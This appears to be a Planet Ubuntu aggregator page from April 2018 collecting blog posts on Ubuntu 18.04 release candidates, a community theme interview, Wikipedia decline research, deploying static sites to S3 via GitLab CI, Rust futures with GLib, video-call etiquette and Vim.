25 Apr 2018

Stephen Michael Kellat: Saying Something in April 2018

A goal is to try to say something once per month that posts to Planet Ubuntu. That can be a hard thing to do. We've been through an extremely rough time at work. During this season we have had a number of unprecedented things happen including an interruption in appropriations (legal authority to spend money), retroactive changes to the tax laws in the middle of the filing season, and the mainframe itself flaming out in a gigantic crash (metaphorically speaking) on the last day of the filing season. Our contingency plans are well-exercised.

Being able to bang on (that is to say, percussively test) Bionic Beaver has been a blast. I haven't done ISO testing this round. Instead, I've been using my Xubuntu desktop daily, watching things break and watching apport file bugs. Doing so makes me realize that, frankly, I am not normal in terms of installed packages or workflow. I have quite a bit of LaTeX installed due to church work. I have many ham radio-related things installed. Audio production and video production packages are installed too. Yes, sometimes I break down and even use LibreOffice. I don't have the whole package archive installed but I have a visible chunk of it in place as I use many things in many ways.

I fired up a droplet on Digital Ocean. My production website lives again in a very stripped-down form at http://erielookingproductions.info. The original is kept in LaTeX and the website is produced using LaTeXML which is available in the package archive. That site exhibits probably one of the lesser-trod paths in terms of creating a static web page.

Are we going to have a Carnivorous Camel? Is it a Cautious Cat? What is the new codename?

25 Apr 2018 2:00am GMT

24 Apr 2018

Didier Roche: Welcome To The (Ubuntu) Bionic Age: Behind communitheme: interviewing Merlijn

Interviewing people behind communitheme. Today: Merlijn

As discussed last week when unveiling the communitheme snap for Ubuntu 18.04 LTS, here is a series of interviews this week with some members of the core contributor team shaping this entirely community-driven theme.

Today is the turn of Merlijn, merlijn-sebrechts on the community hub.

Who are you? What are you doing/where are you working? Give us some words and background about you!

I'm Merlijn Sebrechts, I'm a PhD student and teaching assistant at Ghent University in Belgium.

When I went to do an internship in rural Tanzania, I brought an old Dell laptop with Ubuntu 12.10 on it. After being forced to use it for everything for three months, I was actually sad to let it go and go back to my Windows 8.1 laptop, so I removed Windows, put Ubuntu on it and I've been using it exclusively ever since! (and I love it!)

I'm doing research on system administration, specifically on how we can use cloud modeling languages (like Juju!) to make system administration easier. Linux can do so much cool stuff, if it's just configured correctly, so it's a shame that it's so hard to do that.

What are your main contribution areas on communitheme?

I set up some of the building and packaging infrastructure, wrote some documentation about how to test and contribute to the theme, helped review pull requests, sifted through bugs, and joined the discussions in various places.

How did you hear about the new theming effort on Ubuntu, and what made you want to participate actively in it?

I think the new theme effort started with me ranting about Ambiance on one of your (didrocks') blog posts [Note from Didier: I confirm! ;)]. You responded saying that I was free to do something about it, so I suggested getting a bunch of the community together to create a new theme.

I've wanted to contribute back to Ubuntu for a long time and Ambiance really annoyed me, so I was happy to help fix that. I did some drive-by patches to other projects in the past (I tried to fix the "buy Steam for €0" bug, but I didn't get the PR accepted). This is the first significant project I'm working on, so I'm proud that I can be of use, even though I didn't really do much…

I'd encourage anyone to just get their hands dirty and go contribute to Ubuntu. The people are nice, you'll learn a lot and you'll find hidden launchpad corners you never knew existed!

How is the interaction with the larger community, how do you deal with different ideas and opinions on the community hub, issues opened against the projects, PR?

It's impossible for me to keep up with the community… It's important to keep reminding people that there's a human on the other side of the keyboard. However, it's also a lot of fun to see so many passionate people! My mind immediately wanders off and thinks of how we can use this enthusiasm better. You see so many people who are very interested and eager to help, so I tried to make the documentation as clear as possible and explain in detail how to contribute, to lower the barrier to start contributing code, but that only goes so far…

This isn't really answering the question, but I think that the time you (didrocks) spent bootstrapping this whole project is very well-spent time. There are a lot of passionate people out there who can become contributors if they just get a gentle push in the back and if you let them know that you don't have to be paid by Canonical to work on this awesome project. You should do more of this: scout the comments section for people willing to get their hands dirty and give them a cool project to get started with.

What did you think (honestly) about the decision not to ship it by default on 18.04, but to curate it for a little while? Do you think the snap approach for 18.04 will give us more flexibility before shipping a final version?

It wasn't an easy decision to make; I'd much rather have 18.04 ship with a new theme, but I agree that the theme wasn't ready, especially not for a UI freeze. I'm color blind myself, so I know that it's easy for a theme to make a system unusable. Most people use Ubuntu to build stuff; they choose Ubuntu because it helps them get their work done, and/or because they believe in "the cause". Few people choose Ubuntu because of its beauty, so functionality is very important.

My main concern is that people should be able to install the theme without using the command line. I have a bunch of non-techy friends using Ubuntu, and each time they have to use the CLI to do basic stuff, I feel ashamed… However, the snap solves that! You open Ubuntu Software, install the theme, reboot and BAM! You've got yourself a new theme, new system sounds, a new cursor and many UI tweaks!

Any idea or wish on what the theme name should be (communitheme is a project codename)?

The theme is shaped by the Suru design language, with its Japanese influences, and the current Ambiance theme. I have zero knowledge of Japanese, and it seems like an incredibly complex language, so it might be totally off, but translating Ambiance to Japanese gave me Fun'iki. However, I don't want to find out in what strange and interesting ways Ubuntu will break by having an apostrophe in a theme name, and I don't like how the word looks and sounds. It doesn't have that earthy Ubuntu feel.

Suru itself is the verb "to do", which got me to Yaru (to do / to give), which is more informal and can be used in the context of joy and pride, like proudly exclaiming "yatta!" ("I did it!"). But we have to give credit where credit is due: we couldn't have done it without Ambiance, both the theme itself as the inspiration and the atmosphere as the motivation. We're doing it because it's fun, so whatever way you look at it, Ambiance gave us Yaruki: "the motivation to do".

Although I also like the sound of "Yaru" itself, so ¯\_(ツ)_/¯.

Any last words or questions I should have asked you?

"Are you having fun?"

A: "Yes!"

Thanks Merlijn!

And the last interview will come up tomorrow. Do not miss it! :)

24 Apr 2018 9:20am GMT

23 Apr 2018

The Fridge: Ubuntu Weekly Newsletter Issue 524

Welcome to the Ubuntu Weekly Newsletter, Issue 524 for the week of April 15 - 21, 2018 - the full version is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

23 Apr 2018 10:32pm GMT

Benjamin Mako Hill: Is English Wikipedia’s ‘rise and decline’ typical?

This graph shows the number of people contributing to Wikipedia over time:

The Rise and Decline of Wikipedia: The number of active Wikipedia contributors exploded, suddenly stalled, and then began gradually declining. (Figure taken from Halfaker et al. 2013)

The figure comes from "The Rise and Decline of an Open Collaboration System," a well-known 2013 paper that argued that Wikipedia's transition from rapid growth to slow decline in 2007 was driven by an increase in quality control systems. Although many people have treated the paper's finding as representative of broader patterns in online communities, Wikipedia is a very unusual community in many respects. Do other online communities follow Wikipedia's pattern of rise and decline? Does increased use of quality control systems coincide with community decline elsewhere?

In a paper that my student Nathan TeBlunthuis is presenting Thursday morning at the Association for Computing Machinery (ACM) Conference on Human Factors in Computing Systems (CHI), a group of us have replicated and extended the 2013 paper's analysis in 769 other large wikis. We find that the dynamics observed in Wikipedia are a strikingly good description of the average Wikia wiki. They appear to reoccur again and again in many communities.

The original "Rise and Decline" paper (we'll abbreviate it "RAD") was written by Aaron Halfaker, R. Stuart Geiger, Jonathan T. Morgan, and John Riedl. They analyzed data from English Wikipedia and found that Wikipedia's transition from rise to decline was accompanied by increasing rates of newcomer rejection as well as the growth of bots and algorithmic quality control tools. They also showed that newcomers whose contributions were rejected were less likely to continue editing and that community policies and norms became more difficult to change over time, especially for newer editors.

Our paper, just published in the CHI 2018 proceedings, replicates most of RAD's analysis on a dataset of 769 of the largest wikis from Wikia that were active between 2002 and 2010. We find that RAD's findings generalize to this large and diverse sample of communities.

We can walk you through some of the key findings. First, the growth trajectory of the average wiki in our sample is similar to that of English Wikipedia. As shown in the figure below, an initial period of growth stabilizes and leads to decline several years later.

Rise and Decline on Wikia: The average Wikia wiki also experiences a period of growth followed by stabilization and decline (from TeBlunthuis, Shaw, and Hill 2018).

We also found that newcomers on Wikia wikis were reverted more and continued editing less. As on Wikipedia, the two processes were related. Similar to RAD, we also found that newer editors were more likely to have their contributions to the "project namespace" (where policy pages are located) undone as wikis got older. Indeed, the specific estimates from our statistical models are very similar to RAD's for most of these findings!

There were some parts of the RAD analysis that we couldn't reproduce in our context. For example, there are not enough bots or algorithmic editing tools in Wikia to support statistical claims about their effects on newcomers.

At the same time, we were able to do some things that the RAD authors could not. Most importantly, our findings discount some Wikipedia-specific explanations for a rise and decline. For example, English Wikipedia's decline coincided with the rise of Facebook, smartphones, and other social media platforms. In theory, any of these factors could have caused the decline. Because the wikis in our sample experienced rises and declines at similar points in their life-cycle but at different points in time, the rise and decline findings we report seem unlikely to be caused by underlying temporal trends.

The big communities we study seem to have consistent "life cycles" where stabilization and/or decay follows an initial period of growth. The fact that the same kinds of patterns happen on English Wikipedia and other online groups implies a more general set of social dynamics at work that we do not think existing research (including ours) explains in a satisfying way. What drives the rise and decline of communities more generally? Our findings make it clear that this is a big, important question that deserves more attention.

We hope you'll read the paper and get in touch by commenting on this post or emailing Nate if you'd like to learn or talk more. The paper is available online and has been published under an open access license. If you really want to get into the weeds of the analysis, we will soon publish all the data and code necessary to reproduce our work in a repository on the Harvard Dataverse.

Nate TeBlunthuis will be presenting the project this week at CHI in Montréal on Thursday April 26 at 9am in room 517D. For those of you not familiar with CHI, it is the top venue for Human-Computer Interaction. All CHI submissions go through double-blind peer review and the papers that make it into the proceedings are considered published (same as journal articles in most other scientific fields). Please feel free to cite our paper and send it around to your friends!


This blog post, and the open access paper that it describes, is a collaborative project with Aaron Shaw, led by Nate TeBlunthuis. A version of this blog post was originally posted on the Community Data Science Collective blog. Financial support came from the US National Science Foundation (grants IIS-1617129, IIS-1617468, and GRFP-2016220885), Northwestern University, the Center for Advanced Study in the Behavioral Sciences at Stanford University, and the University of Washington. This project was completed using the Hyak high performance computing cluster at the University of Washington.

23 Apr 2018 9:20pm GMT

Lubuntu Blog: This Week in Lubuntu Development #4

Here is the fourth issue of This Week in Lubuntu Development. You can read last week's issue here.

Changes

General

Some work was done on the Lubuntu Manual by Lubuntu contributor Lyn Perrine. You can see the commits she has made here. We need your help with the Lubuntu Manual! Take a look at PROGRESS.md […]

23 Apr 2018 4:00pm GMT

Riccardo Padovani: AWS S3 + GitLab CI = automatic deploy for every branch of your static website

You have a static website and you want to share the latest changes with your team before going live! How do you do that?

If you use GitLab and you have an AWS account, it's time to step up your game and automate everything. We are going to set up a system which will deploy every branch you create to S3, and clean up after itself when the branch is merged or deleted.

AWS S3 is just a storage container, so of course you can't host a dynamic website this way, but for a static one (like this blog), it is perfect.

Also, please note that AWS S3 buckets used for hosting a website are public; while you need to know the URL to access them, there are ways to list them. So do not set up this system if you have private data on your website.

Of course, standard S3 prices will apply.

We will use GitLab CI, since it is shipped with GitLab and deeply integrated with it.

GitLab CI is a very powerful Continuous Integration system with a lot of different features, and with every new release, new features land. It has rich technical documentation that I suggest you read.

If you want to know why Continuous Integration is important, I suggest reading this article, while for the reasons to use GitLab CI specifically, I leave the job to GitLab.com itself. I've also written another article with a small introduction to GitLab CI.

I assume you already have an AWS account and know roughly how GitLab CI works. If not, please create an account and read some of the links above to learn about GitLab CI.

Setting up AWS

The first thing is setting up AWS S3 and a dedicated IAM user to push to S3.

Since every developer with permission to push to the repository will have access to the tokens of the IAM user, it is better to limit its permissions as much as possible.

Setting up S3

To set up S3, go to the S3 control panel, create a new bucket, choose a name (from now on, I will use example-bucket) and a region, and finish the creation leaving the default settings.

After that, you need to enable website management: go to Bucket -> Properties and enable Static website hosting, selecting Use this bucket to host a website as in the image. As the index, put index.html - you can then upload a landing page there, if you want.

Take note of the bucket's URL; we will need it.

s3 bucket creation

We now grant everybody permission to read objects; we will use the policy described in the AWS guide. For more information on how to host a static website, please follow the official documentation.

To grant the read permissions, go to Permissions->Bucket policy and insert:

{
  "Version":"2012-10-17",
  "Statement":[{
    "Sid":"PublicReadGetObject",
    "Effect":"Allow",
          "Principal": "*",
    "Action":["s3:GetObject"],
    "Resource":["arn:aws:s3:::example-bucket/*"]
  }]
}

Of course, you need to insert your bucket's name in the Resource line.

Creating the IAM user

Now we need to create the IAM user that will upload content to the S3 bucket, with a policy that allows uploads only to our bucket.

Go to IAM and create a new policy, with the name you prefer:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:PutObject",
                "s3:DeleteObject"
            ],
            "Resource": "arn:aws:s3:::example-bucket/*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "s3:ListObjects",
            "Resource": "*"
        }
    ]
}

Of course, again, you should change the Resource field to match the name of your bucket. If you know the GitLab runners' IPs, you can restrict the policy to those IPs.

Now you can create a new user granting it Programmatic access. I will call it gitlabs3uploader. Assign it the policy we just created.

iam user creation

For more information on how to manage multiple AWS accounts for security reasons, I leave you to the official guide.

Setting up GitLab CI

We need to inject the credentials into the GitLab runner. Go to your project, Settings -> CI / CD -> Secret variables and set two variables holding the access key ID and secret access key of the IAM user created above (naming them AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY lets the AWS CLI pick them up automatically):

Since we want to publish every branch, we do not set them as protected, because they need to be available in every branch.

secret variables config

.gitlab-ci.yml

We now need to explain to GitLab how to publish the website. If you need to build it first, you can do so. rpadovani.com uses Jekyll, so my .gitlab-ci.yml file looks like this:

image: "registry.gitlab.com/rpadovani/rpadovani.com:latest" # Custom Ruby image, replace with whatever you want
stages:
  - build
  - deploy

variables:
  AWS_DEFAULT_REGION: eu-central-1 # The region of our S3 bucket
  BUCKET_NAME: bucket-name         # Your bucket name

cache:
  paths:
    - vendor

buildJekyll:  # A job to build the static website - replace it with your build methods
  stage: build
  script:
    - bundle install --path=vendor/
    - bundle exec jekyll build --future # The server is in another timezone..
  artifacts:
    paths:
      - _site/  # This is what we want to publish, replace with your `dist` directory

deploys3:
  image: "python:latest"  # We use python because there is a well-working AWS Sdk
  stage: deploy
  dependencies:
    - buildJekyll      # We want to specify dependencies in an explicit way, to avoid confusion if there are different build jobs
  before_script:
    - pip install awscli # Install the SDK
  script:
    - aws s3 cp _site s3://${BUCKET_NAME}/${CI_COMMIT_REF_SLUG} --recursive # Upload the build to a per-branch path; BUCKET_NAME is set in the variables above
  environment:
    name: ${CI_COMMIT_REF_SLUG}
    url: http://${BUCKET_NAME}.s3-website.eu-central-1.amazonaws.com/${CI_COMMIT_REF_SLUG}  # This is the url of the bucket we saved before
    on_stop: clean_s3 # When the branch is merged, we clean up after ourself

clean_s3:
  image: "python:latest"
  stage: deploy
  before_script:
    - pip install awscli
  script:
    - aws s3 rm s3://${BUCKET_NAME}/${CI_COMMIT_REF_SLUG} --recursive # Remove the branch's deployment; BUCKET_NAME is set in the variables above
  environment:
    name: ${CI_COMMIT_REF_SLUG}
    action: stop
  when: manual

For more information about dynamic environments, see the documentation.

To verify your .gitlab-ci.yml is correct, go to your project on GitLab, then CI / CD -> Pipelines; at the top right of the page there is a CI Lint link. It not only lints your code, but also creates a nice overview of all your jobs.

ci lint

Thanks to the environments, we will have the link to the test deployment directly in the merge request, so your QA team, and every other stakeholder interested in seeing the website before it goes to production, can do so directly from GitLab.

Merge request overview

Also, after you merge your branch, GitLab will clean up after itself, so you do not have useless websites left in S3.

You can also see all the deployments in CI / CD -> Environments, and trigger new deploys.

Conclusion

They say 2018 is the year of DevOps. I am not sure about that, but I am sure that a well-configured Continuous Integration and Continuous Delivery system saves you and your company a lot of time and headaches.

If your builds are perfectly reproducible, and everything is automatic, you can focus on what really matters: developing solutions for your customers.

This was a small example of how to integrate AWS and GitLab, but you know the only limit is your imagination. Also, a lot of new features are introduced every month in GitLab and GitLab CI, so keep an eye on the GitLab blog.

Kudos to the GitLab team (and the other folks who help in their free time) for their awesome work!

If you have any questions or feedback about this blog post, please drop me an email at riccardo@rpadovani.com or tweet me :-) Feel free to suggest additions, or clearer ways to phrase paragraphs (English is not my mother tongue).

Bye for now,
R.

P.S.: if you have found this article helpful and you'd like me to write others, would you mind helping me reach Ballmer's peak and buying me a beer?

23 Apr 2018 2:30pm GMT

Sebastian Dröge: GLib/GIO async operations and Rust futures + async/await

Unfortunately I was not able to attend the Rust+GNOME hackfest in Madrid last week, but I could at least spend some of my work time at Centricular on implementing one of the things I wanted to work on during the hackfest. The other one, more closely related to the gnome-class work, will be the topic of a future blog post once I actually have something to show.

So back to the topic. With the latest GIT version of the Rust bindings for GLib, GTK, etc. it is now possible to make use of the Rust futures infrastructure for GIO async operations and various other functions. This should make writing GNOME applications, and GLib-using applications in general, in Rust quite a bit more convenient.

For the impatient, the summary is that you can use Rust futures with GLib and GIO now, that it works both on the stable and nightly version of the compiler, and with the nightly version of the compiler it is also possible to use async/await. An example with the latter can be found here, and an example just using futures without async/await here.

Table of Contents

  1. Futures
    1. Futures in Rust
    2. Async/Await
    3. Tokio
  2. Futures & GLib/GIO
    1. Callbacks
    2. GLib Futures
    3. GIO Asynchronous Operations
    4. Async/Await
  3. The Future

Futures

First of all, what are futures and how do they work in Rust? In a few words, a future (also called a promise elsewhere) is a value that represents the result of an asynchronous operation, e.g. establishing a TCP connection. The operation itself (usually) runs in the background, and only once the operation is finished (or fails) does the future resolve to the result of that operation. There are all kinds of ways to combine futures, e.g. to execute some other (potentially async) code with the result once the first operation has finished.

It's a concept that is also widely used in various other programming languages (e.g. C#, JavaScript, Python, …) for asynchronous programming and can probably be considered a proven concept at this point.

Futures in Rust

In Rust, a future is basically an implementation of a relatively simple trait called Future. The following is the definition as of now, but there are discussions to change/simplify/generalize it and to also move it into the Rust standard library:

pub trait Future {
    type Item;
    type Error;

    fn poll(&mut self, cx: &mut task::Context) -> Poll<Self::Item, Self::Error>;
}

Anything that implements this trait can be considered an asynchronous operation that resolves to either an Item or an Error. Consumers of the future would call the poll method to check if the future has resolved already (to a result or error), or if the future is not ready yet. In case of the latter, the future itself would at a later point, once it is ready to proceed, notify the consumer about that. It would get a way for notifications from the Context that is passed, and proceeding does not necessarily mean that the future will resolve after this but it could just advance its internal state closer to the final resolution.

Calling poll manually is kind of inconvenient, so generally this is handled by an Executor on which the futures are scheduled and which runs them until their resolution. Equally, it's inconvenient to have to implement that trait directly, so for most common operations there are combinators that can be used on futures to build new futures, usually via closures in one way or another. For example, the following would run the passed closure with the successful result of the future, then have it return another future (Ok(()) is converted via IntoFuture to the future that always resolves successfully with ()), and also map any errors to ():

fn our_future() -> impl Future<Item = (), Error = ()> {
    some_future
        .and_then(|res| {
            do_something(res);
            Ok(())
        })
        .map_err(|_| ())
}

A future represents only a single value, but there is also a trait for something producing multiple values: a Stream. For more details, best to check the documentation.
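
For reference, here is a rough sketch of what the Stream trait looks like in the same pre-1.0 era of the futures crate (the exact definition may differ in details):

pub trait Stream {
    type Item;
    type Error;

    // Like Future::poll, but can yield a sequence of items over time;
    // resolving to None signals that the stream is finished.
    fn poll_next(&mut self, cx: &mut task::Context) -> Poll<Option<Self::Item>, Self::Error>;
}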

Async/Await

The above way of combining futures via combinators and closures is still not too great, and is still close to callback hell. In other languages (e.g. C#, JavaScript, Python, …) this was solved by introducing new features to the language: async for declaring futures with normal code flow, and await for suspending execution transparently and resuming at that point in the code with the result of a future.

Of course this was also implemented in Rust. Currently based on procedural macros, but there are discussions to actually move this also directly into the language and standard library.

The above example would look something like the following with the current version of the macros

#[async]
fn our_future() -> Result<(), ()> {
    let res = await!(some_future)
        .map_err(|_| ())?;

    do_something(res);
    Ok(())
}

This looks almost like normal, synchronous code but is internally converted into a future and completely asynchronous.

Unfortunately this is currently only available on the nightly version of Rust until various bits and pieces get stabilized.

Tokio

Most of the time when people talk about futures in Rust, they implicitly also mean Tokio. Tokio is a pure Rust, cross-platform asynchronous IO library and based on the futures abstraction above. It provides a futures executor and various types for asynchronous IO, e.g. sockets and socket streams.

But while Tokio is a great library, we're not going to use it here and instead implement a futures executor around GLib. And on top of that implement various futures, also around GLib's sister library GIO, which is providing lots of API for synchronous and asynchronous IO.

Just like all IO operations in Tokio, all GLib/GIO asynchronous operations are dependent on running with their respective event loop (i.e. the futures executor) and while it's possible to use both in the same process, each operation has to be scheduled on the correct one.

Futures & GLib/GIO

Asynchronous operations and generally everything event related (timeouts, …) are based on callbacks that you have to register, and are running via a GMainLoop that is executing events from a GMainContext. The latter is just something that stores everything that is scheduled and provides API for polling if something is ready to be executed now, while the former does exactly that: executing.

Callbacks

The callback based API is also available via the Rust bindings, and would for example look as follows

glib::timeout_add(20, || {
    do_something_after_20ms();
    glib::Continue(false) // don't call again
});

glib::idle_add(|| {
    do_something_from_the_main_loop();
    glib::Continue(false) // don't call again
});

some_async_operation(|res| {
    match res {
        Err(err) => report_error_somehow(),
        Ok(res) => {
            do_something_with_result(res);
            some_other_async_operation(|res| {
                do_something_with_other_result(res);
            });
        }
    }
});

As can be seen here already, the callback-based approach leads to quite non-linear code and deep indentation due to all the closures. Error handling also becomes quite tricky, due to having to handle errors from a completely different call stack.

Compared to C this is still far more convenient due to actually having closures that can capture their environment, but we can definitely do better in Rust.

The above code also assumes that somewhere a main loop is running on the default main context, which could be achieved with the following e.g. inside main()

let ctx = glib::MainContext::default();
let l = glib::MainLoop::new(Some(&ctx), false);
ctx.push_thread_default();

// All operations here would be scheduled on this main context
do_things(&l);

// Run everything until someone calls l.quit()
l.run();
ctx.pop_thread_default();

It is also possible to explicitly select for various operations on which main context they should run, but that's just a minor detail.

GLib Futures

To make this situation a bit nicer, I've implemented support for futures in the Rust bindings. This means, that the GLib MainContext is now a futures executor (and arbitrary futures can be scheduled on it), all the GSource related operations in GLib (timeouts, UNIX signals, …) have futures- or stream-based variants and all the GIO asynchronous operations also come with futures variants now. The latter are autogenerated with the gir bindings code generator.

To enable all this, the futures feature of the glib and gio crates has to be enabled, but that's about it. It is currently still hidden behind a feature gate because the futures infrastructure is still going to go through some API-incompatible changes in the near future.

So let's take a look at how to use it. First of all, setting up the main context and executing a trivial future on it

let c = glib::MainContext::default();
let l = glib::MainLoop::new(Some(&c), false);

c.push_thread_default();

// Spawn a future that is called from the main context
// and after printing something just quits the main loop
let l_clone = l.clone();
c.spawn(futures::lazy(move |_| {
    println!("we're called from the main context");
    l_clone.quit();
    Ok(())
}));

l.run();

c.pop_thread_default();

Apart from spawn(), there is also spawn_local(). The former can be called from any thread but requires the future to implement the Send trait (that is, it must be safe to send it to other threads), while the latter can only be called from the thread that owns the main context but allows any kind of future to be spawned. In addition there is also a block_on() function on the main context, which allows running non-static futures up to their completion and returns their result. The spawn functions only work with static futures (i.e. futures that have no references to any stack frame) and require the futures to be infallible and resolve to ().

The above code already shows one of the advantages of using futures: it is possible to use all generic futures (those that don't require a specific executor), like futures::lazy or the mpsc/oneshot channels, with GLib now, as well as any of the combinators that are available on futures:

let c = MainContext::new();

let res = c.block_on(timeout_future(20)
    .and_then(move |_| {
        // Called after 20ms
        Ok(1)
    })
);

assert_eq!(res, Ok(1));

This example also shows the block_on functionality to return an actual value from the future (1 in this case).

GIO Asynchronous Operations

Similarly, all asynchronous GIO operations are now available as futures. For example, to open a file asynchronously and get a gio::InputStream to read from, the following could be done:

let file = gio::File::new_for_path("Cargo.toml");

let l_clone = l.clone();
c.spawn_local(
    // Try to open the file
    file.read_async_future(glib::PRIORITY_DEFAULT)
        .map_err(|(_file, err)| {
            format!("Failed to open file: {}", err)
        })
        .and_then(move |(_file, strm)| {
            // Here we could now read from the stream, but
            // instead we just quit the main loop
            l_clone.quit();

            Ok(())
        })
);

A bigger example can be found in the gtk-rs examples repository here. This example is basically reading a file asynchronously in 64 byte chunks and printing it to stdout, then closing the file.

In the same way, network operations or any other asynchronous operation can be handled via futures now.

Async/Await

Compared to a callback-based approach, that bigger example is already a lot nicer but still quite heavy to read. With the async/await extension that I mentioned above already, the code looks much nicer in comparison and really almost like synchronous code. Except that it is not synchronous.

#[async]
fn read_file(file: gio::File) -> Result<(), String> {
    // Try to open the file
    let (_file, strm) = await!(file.read_async_future(glib::PRIORITY_DEFAULT))
        .map_err(|(_file, err)| format!("Failed to open file: {}", err))?;

    Ok(())
}

fn main() {
    [...]
    let future = async_block! {
        match await!(read_file(file)) {
            Ok(()) => (),
            Err(err) => eprintln!("Got error: {}", err),
        }
        l_clone.quit();
        Ok(())
    };

    c.spawn_local(future);
    [...]
}

For compiling this code, the futures-nightly feature has to be enabled for the glib crate, and a nightly compiler must be used.

The bigger example from before with async/await can be found here.

With this we're already very close in Rust to having the same convenience as in other languages with asynchronous programming. And also it is very similar to what is possible in Vala with GIO asynchronous operations.

The Future

For now this is all finished and available from GIT of the glib and gio crates. This will have to be updated in the future whenever the futures API changes, but it is planned to stabilize all this in Rust by the end of this year.

In the future it might also make sense to add futures variants for all the GObject signal handlers, so that e.g. handling a click on a GTK+ button could be done similarly from a future (or rather from a Stream, as a signal can be emitted multiple times). Whether that ends up being more convenient than the callback-based approach that is currently used remains to be seen. Some experimentation would be necessary here. Also, how to handle return values of signal handlers would have to be figured out.

23 Apr 2018 8:46am GMT

Jorge Castro: How to video conference without people hating you

While video conferencing has been a real boost to productivity, there are still lots of things that can go wrong during a video conference call.

There are some things that are just plain out of your control, but there are some things that you can control. So, after doing these for the past 15 years or so, here are some tips if you're just getting into remote work and want to do a better job. Of course I have been guilty of all of these. :D

Stuff to have

What about an integrated headset and microphone? That totally depends on the type. I tend to prefer the full sound of a real microphone, but the boom mics on some of these headsets are quite good. If you have awesome headphones already, you can add a modmic to turn them into a headset. I find that even the most budget dedicated headsets sound better than earbud microphones.

Stuff to get rid of

Garbage habits we all hate

If you're just dialing in to listen then most of these won't apply to you, however …

Treat video conferencing like you do everything else at work

We invest in our computers and our developer tools, so it's important to think seriously about putting your video conferencing footprint in that namespace. There is a good chance no one will notice that you always sound good, but it's one of those background quality things that just makes everyone more productive. Besides, think of the money you've spent on your laptop and everything else to make you better at work, better audio gear is a good investment.

In the real world, sometimes you just have to travel, and you find yourself stuck on a laptop on hotel wireless in a corner trying to do your job, but I strive to make that situation the exception!

23 Apr 2018 12:00am GMT

22 Apr 2018

Sean Davis: MenuLibre 2.2.0 Released

After 2.5 years of on-again/off-again development, a new stable release of MenuLibre is now available! This release includes a vast array of changes since 2.0.7 and is recommended for all users.

What's New?

Since MenuLibre 2.0.7, the previous stable release.

General

New Features

Interface Updates

Downloads

Source tarball (md5, sig)

Available on Debian Testing/Unstable and Ubuntu 18.04 "Bionic Beaver". Included in Xubuntu 18.04.

22 Apr 2018 11:08am GMT

Sean Davis: Mugshot 0.4.0 Released

Mugshot, the simple user configuration utility, has hit a new stable milestone! Release 0.4.0 wraps up the 0.3 development cycle with full camera support for the past several years of GTK+ releases (and a number of other fixes).

What's New?

Since Mugshot 0.2.5, the previous stable release.

Downloads

Source tarball (md5, sig)

Available in Debian Unstable and Ubuntu 18.04 "Bionic Beaver". Included in Xubuntu 18.04.

22 Apr 2018 10:17am GMT

Ubuntu Studio: Ubuntu Studio 18.04 Release Candidate

The Release Candidate for Ubuntu Studio 18.04 is ready for testing. Download it here. There are some known issues:

- Volume label still set to Beta
- base-files still not the final version
- kernel will have (at least) one more revision

Please report any bugs using ubuntu-bug {package name}. Final release is scheduled to be released on […]

22 Apr 2018 2:34am GMT

Kubuntu General News: Bionic (18.04) Release Candidate images ready for testing!

Initial RC (Release Candidate) images for the Kubuntu Bionic Beaver (18.04) are now available for testing.

The Kubuntu team will be releasing 18.04 on 26 April. The final Release Candidate milestone is available today, 21 April.

This is the first spin of a release candidate in preparation for the RC milestone. If major bugs are encountered and fixed, the RC images may be respun.

Kubuntu Beta pre-releases are NOT recommended for:

Kubuntu Beta pre-releases are recommended for:

Getting Kubuntu 18.04 RC testing images:

To upgrade to Kubuntu 18.04 pre-releases from 17.10, run sudo do-release-upgrade -d from a command line.

Download a Bootable image and put it onto a DVD or USB Drive via the download link at

http://iso.qa.ubuntu.com/qatracker/milestones/389/builds

This is also the direct link to report your findings and any bug reports you file.

See our release notes: https://wiki.ubuntu.com/BionicBeaver/ReleaseNotes/Kubuntu

Please report your results on the Release tracker.

22 Apr 2018 1:13am GMT

Gustavo Silva: Why Everyone should know vim

Vim is an improved version of Vi, a well-known text editor available by default in UNIX distributions. Another alternative is Emacs, but the two are so different that I kind of feel they serve different purposes. Both are great, regardless.

I don't feel Vim is necessarily a geeky kind of taste. Vim introduced modal editing to me and that has changed my life, really. If you have ever tried Vim, you may have noticed you have to press "i" or "a" (lower case) to start writing (note: I'm aware there are more ways to start editing, but the purpose here is not to cover Vim's functionality). The fun part starts once you realize you can associate the Insert and Append commands with something. Then editing text becomes thinking of what you want the computer to show instead of struggling with where you are before writing. The same goes for other commands, which are easily converted to mnemonics, and this is what helped me get comfortable with Vim. Note that Emacs does not have this kind of keybinding by default, but it does have a Vim-like mode - Evil (Extensible vi Layer). More often than not, I just need to think of what I want to accomplish and type the first letters, like Replace, Visual, Delete, and so on. It is a modal editor after all, meaning it has modes for everything. This is also what increases my productivity when writing files: I just think of my intentions and Vim does the rest.

Here's another cool example. Imagine this Python line (do not fear, this is not a coding post):

def function(aParameterThatChanged)

In a text editor without modal editing, you would need to grab your mouse, carefully select the text inside the parentheses (you might be able to double-click the text to highlight it) and then delete it, type over it, etc. In Vim, there are basically two options to do that. You can type di( and that would delete inside the symbol you typed. How helpful is that? Want to blow your mind? Typing ci( would actually change inside the symbol by deleting and switching to insert mode automatically.

Vim has a significant learning curve, I'm aware of that. Many people get discouraged on the first try, but sticking with Vim has changed how I perceive text editing and I know, for sure, it has been a positive change. I write faster, editing is instant, I don't need the mouse for anything at all, Vim starts instantly, and there are many other cool features. For those looking for customization, Vim is fully customizable without putting much load on your CPU, as happens in Atom. Vim is also easily accessible anywhere. Take IntelliJ, for example, a multi-platform Java IDE. It even recommends installing the Vim plugin right after the installation process. Obviously, I did it. In a UNIX terminal, Vim comes by default.

I just wanted to praise modal editing, more than Vim itself, although the tool is amazing. I believe everyone should know Vim. It is simpler than Emacs, has lots of potential and can make you more productive. But modal editing is what got me addicted. I can't install an IDE without looking for Vim extensions.

